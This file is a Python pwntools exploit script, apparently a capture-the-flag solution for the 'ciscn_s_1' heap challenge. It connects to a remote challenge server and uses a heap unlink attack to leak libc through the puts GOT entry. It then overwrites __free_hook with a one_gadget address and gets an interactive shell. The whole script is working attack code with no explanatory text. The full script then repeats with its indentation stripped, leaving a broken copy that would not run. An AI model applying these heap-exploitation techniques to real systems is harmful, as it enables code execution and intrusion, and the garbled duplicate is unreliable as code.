Mech0n/ciscn_s_1.py

## ciscn_s_1.py
#! /usr/bin/python
#-*- coding: utf-8 -*-
from pwn import *

context.terminal = ['tmux', 'splitw', '-h']
context(arch = 'amd64' , os = 'linux', log_level='debug')

# p = process('./pwn')
p = remote('node3.buuoj.cn', 26285)
elf = ELF('./pwn')
# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc = ELF('libc6_2.27-3ubuntu1_amd64.so')

heap = 0x6020E0
hlen = 0x602060
key1 = 0x6022BC
key2 = 0x6022B8

def debug(p, cmd):
    gdb.attach(p, cmd)
    pause()

def add(idx, size, payload):
    p.sendlineafter('4.show\n', str(1))
    p.sendlineafter('index:', str(idx))
    p.sendlineafter('size:', str(size))
    p.sendafter('content:', payload)

def delete(idx):
    p.sendlineafter('4.show\n', str(2))
    p.sendlineafter('index:', str(idx))

def edit(idx, payload):
    p.sendlineafter('4.show\n', str(3))
    p.sendlineafter('index:', str(idx))
    p.sendafter('content:', payload)

def show(idx):
    p.sendlineafter('4.show\n', str(4))
    p.sendlineafter('index:', str(idx))

def LEAK():
    # leak libc && unlink
    for i in range(7):
        add(i + 1, 0xf8, 'mech0n\n')

    add(8, 0xf8, 'mech0n\n')
    add(32, 0xf8, 'mech0n\n')   # 0x6021e0
    add(9, 0xf8, 'mehc0n\n')
    add(10, 0xf8, 'mech0n\n')
    # debug(p, 'b *0x400990\n') # add() -> nop

    payload = p64(0) + p64(0xf1) + p64(0x6021e0 - 3 * 8) + p64(0x6021e0 - 2 * 8)
    payload = payload.ljust(0xf0, '\x00')
    payload += p64(0xf0)
    # debug(p, 'b *0x400B73\n') # edit() -> nop
    edit(32, payload)
    for i in range(7):
        delete(i + 1)
    # debug(p, 'b *0x400A61\n')   # delete() -> nop
    delete(9)

    payload = p64(elf.got['puts']) * 3 + p64(0x6021e0)
    payload = payload.ljust(0xf0, '\x00')
    payload += p64(0x0000000a00000001)
    # debug(p, 'b *0x400B73\n') # edit() -> nop
    edit(32, payload)
    show(29)
    puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
    libc.address = puts_addr - libc.sym['puts']
    success('PUTS: ' + str(hex(puts_addr)))
    success('LIBC: ' + str(hex(libc.address)))

    # og = 0x4f365
    og = 0x4f322 # 0x4f3c2
    # og = 0x10a45c
    payload = p64(libc.sym['__free_hook']) + '\n'
    edit(32, payload)
    payload = p64(og + libc.address)
    # debug(p, 'b *0x400B73\n') # edit() -> nop
    edit(32, payload)

    delete(10)
    p.interactive()


if __name__ == "__main__":
    LEAK()
	#! /usr/bin/python
	#-- coding: utf-8 --
	from pwn import *

	context.terminal = ['tmux', 'splitw', '-h']
	context(arch = 'amd64' , os = 'linux', log_level='debug')

	# p = process('./pwn')
	p = remote('node3.buuoj.cn', 26285)
	elf = ELF('./pwn')
	# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
	libc = ELF('libc6_2.27-3ubuntu1_amd64.so')

	heap = 0x6020E0
	hlen = 0x602060
	key1 = 0x6022BC
	key2 = 0x6022B8

	def debug(p, cmd):
	gdb.attach(p, cmd)
	pause()

	def add(idx, size, payload):
	p.sendlineafter('4.show\n', str(1))
	p.sendlineafter('index:', str(idx))
	p.sendlineafter('size:', str(size))
	p.sendafter('content:', payload)

	def delete(idx):
	p.sendlineafter('4.show\n', str(2))
	p.sendlineafter('index:', str(idx))

	def edit(idx, payload):
	p.sendlineafter('4.show\n', str(3))
	p.sendlineafter('index:', str(idx))
	p.sendafter('content:', payload)

	def show(idx):
	p.sendlineafter('4.show\n', str(4))
	p.sendlineafter('index:', str(idx))

	def LEAK():
	# leak libc && unlink
	for i in range(7):
	add(i + 1, 0xf8, 'mech0n\n')

	add(8, 0xf8, 'mech0n\n')
	add(32, 0xf8, 'mech0n\n') # 0x6021e0
	add(9, 0xf8, 'mehc0n\n')
	add(10, 0xf8, 'mech0n\n')
	# debug(p, 'b *0x400990\n') # add() -> nop

	payload = p64(0) + p64(0xf1) + p64(0x6021e0 - 3 * 8) + p64(0x6021e0 - 2 * 8)
	payload = payload.ljust(0xf0, '\x00')
	payload += p64(0xf0)
	# debug(p, 'b *0x400B73\n') # edit() -> nop
	edit(32, payload)
	for i in range(7):
	delete(i + 1)
	# debug(p, 'b *0x400A61\n') # delete() -> nop
	delete(9)

	payload = p64(elf.got['puts']) * 3 + p64(0x6021e0)
	payload = payload.ljust(0xf0, '\x00')
	payload += p64(0x0000000a00000001)
	# debug(p, 'b *0x400B73\n') # edit() -> nop
	edit(32, payload)
	show(29)
	puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
	libc.address = puts_addr - libc.sym['puts']
	success('PUTS: ' + str(hex(puts_addr)))
	success('LIBC: ' + str(hex(libc.address)))

	# og = 0x4f365
	og = 0x4f322 # 0x4f3c2
	# og = 0x10a45c
	payload = p64(libc.sym['__free_hook']) + '\n'
	edit(32, payload)
	payload = p64(og + libc.address)
	# debug(p, 'b *0x400B73\n') # edit() -> nop
	edit(32, payload)

	delete(10)
	p.interactive()


	if __name__ == "__main__":
	LEAK()